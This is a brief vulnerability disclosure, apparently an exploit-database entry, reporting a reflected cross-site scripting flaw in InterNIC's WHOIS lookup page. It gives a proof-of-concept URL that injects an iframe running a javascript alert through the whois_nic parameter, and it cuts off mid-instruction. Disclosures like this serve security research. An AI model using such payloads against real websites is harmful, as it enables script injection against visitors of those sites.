# Title : InterNIC WHOIS lookup XSS exploit # Description : InterNIC has a WHOIS lookup function wich suffers from an XSS vulnerability # Author : Tosser # Contact : ht7015@gmail.com # Proof : http://reports.internic.net/cgi/whois?whois_nic=%3Ciframe%20src=%22javascript:alert('XSS')%22%3E&type=domain or go to http://www.internic.net/, then choose Whois from the menu, and type